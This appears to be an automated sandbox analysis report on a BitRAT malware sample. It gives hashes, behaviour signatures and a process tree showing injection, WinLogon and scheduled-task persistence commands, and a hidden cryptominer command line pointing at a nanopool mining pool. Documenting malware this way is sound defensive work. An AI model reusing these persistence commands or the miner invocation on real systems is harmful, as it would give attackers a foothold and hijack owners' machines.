Analysis
-
max time kernel
149s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
26/04/2021, 22:57
Static task
static1
Behavioral task
behavioral1
Sample
6c2934d4_by_Libranalysis.exe
Resource
win7v20210408
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
6c2934d4_by_Libranalysis.exe
Resource
win10v20210410
0 signatures
0 seconds
General
-
Target
6c2934d4_by_Libranalysis.exe
-
Size
3.5MB
-
MD5
6c2934d437e948bf2727a4358edb9a59
-
SHA1
f5a10d17ebb6c2bd247156387d19accc6819cd3f
-
SHA256
aee478258bbebf0a4cb76eb703c210fa363edbb22d484fe3e6fbcf5f2c3d1af4
-
SHA512
ccb7c83a5c4f9f96aeeb03ee1460d964bae698e7a0d6b3aec1ab96af0ca7230173023c5c3b1cef29283053153181c69aec3a96bb027e3b39a94fd50ccdf5c246
Score
10/10
Malware Config
Signatures
-
BitRAT Payload 1 IoCs
resource yara_rule behavioral2/memory/2664-120-0x00000000007E2370-mapping.dmp family_bitrat -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\nDlv4j2nb6r0yUVx\\NHZjdsjj02O0.exe\",explorer.exe" 6c2934d4_by_Libranalysis.exe -
Executes dropped EXE 6 IoCs
pid Process 3144 YNFLdycIqTEDbJgo.exe 2820 wsappx.exe 2940 sihost32.exe 3436 steamgfx.exe 800 sihost32.exe 2144 steamgfx.exe -
resource yara_rule behavioral2/memory/2664-119-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/2664-122-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2664 cvtres.exe 2664 cvtres.exe 2664 cvtres.exe 2664 cvtres.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3896 set thread context of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3436 set thread context of 3928 3436 steamgfx.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1296 schtasks.exe 1468 schtasks.exe 1428 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3896 6c2934d4_by_Libranalysis.exe 3896 6c2934d4_by_Libranalysis.exe 2820 wsappx.exe 2820 wsappx.exe 3436 steamgfx.exe 3436 steamgfx.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3896 6c2934d4_by_Libranalysis.exe Token: SeShutdownPrivilege 2664 cvtres.exe Token: SeDebugPrivilege 2820 wsappx.exe Token: SeDebugPrivilege 3436 steamgfx.exe Token: SeDebugPrivilege 2144 steamgfx.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2664 cvtres.exe 2664 cvtres.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 3896 wrote to memory of 3144 3896 6c2934d4_by_Libranalysis.exe 78 PID 3896 wrote to memory of 3144 3896 6c2934d4_by_Libranalysis.exe 78 PID 3896 wrote to memory of 3144 3896 6c2934d4_by_Libranalysis.exe 78 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3896 wrote to memory of 2664 3896 6c2934d4_by_Libranalysis.exe 79 PID 3144 wrote to memory of 2820 3144 YNFLdycIqTEDbJgo.exe 80 PID 3144 wrote to memory of 2820 3144 YNFLdycIqTEDbJgo.exe 80 PID 2820 wrote to memory of 3800 2820 wsappx.exe 82 PID 2820 wrote to memory of 3800 2820 wsappx.exe 82 PID 3800 wrote to memory of 1296 3800 cmd.exe 84 PID 3800 wrote to memory of 1296 3800 cmd.exe 84 PID 2820 wrote to memory of 2940 2820 wsappx.exe 85 PID 2820 wrote to memory of 2940 2820 wsappx.exe 85 PID 2820 wrote to memory of 3436 2820 wsappx.exe 86 PID 2820 wrote to memory of 3436 2820 wsappx.exe 86 PID 3436 wrote to memory of 2172 3436 steamgfx.exe 87 PID 3436 wrote to memory of 2172 3436 steamgfx.exe 87 PID 2172 wrote to memory of 1468 2172 cmd.exe 89 PID 2172 wrote to memory of 1468 2172 cmd.exe 89 PID 3436 wrote to memory of 800 3436 steamgfx.exe 90 PID 3436 wrote to memory of 800 3436 steamgfx.exe 90 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 3436 wrote to memory of 3928 3436 steamgfx.exe 91 PID 800 wrote to memory of 2144 800 sihost32.exe 92 PID 800 wrote to memory of 2144 800 sihost32.exe 92 PID 2144 wrote to memory of 1468 2144 steamgfx.exe 93 PID 2144 wrote to memory of 1468 2144 steamgfx.exe 93 PID 1468 wrote to memory of 1428 1468 cmd.exe 95 PID 1468 wrote to memory of 1428 1468 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c2934d4_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\6c2934d4_by_Libranalysis.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Users\Admin\AppData\Local\Temp\YNFLdycIqTEDbJgo.exe"C:\Users\Admin\AppData\Local\Temp\YNFLdycIqTEDbJgo.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\wsappx.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'5⤵
- Creates scheduled task(s)
PID:1296
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"4⤵
- Executes dropped EXE
PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'6⤵
- Creates scheduled task(s)
PID:1468
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "steamgfx" /tr '"C:\Users\Admin\AppData\Local\Temp\steamgfx.exe"'8⤵
- Creates scheduled task(s)
PID:1428
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x687ac23d19389af7925d29280d17be81f33b06c5`@eth-us-east1.nanopool.org:9999 --unam-stealth5⤵PID:3928
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2664
-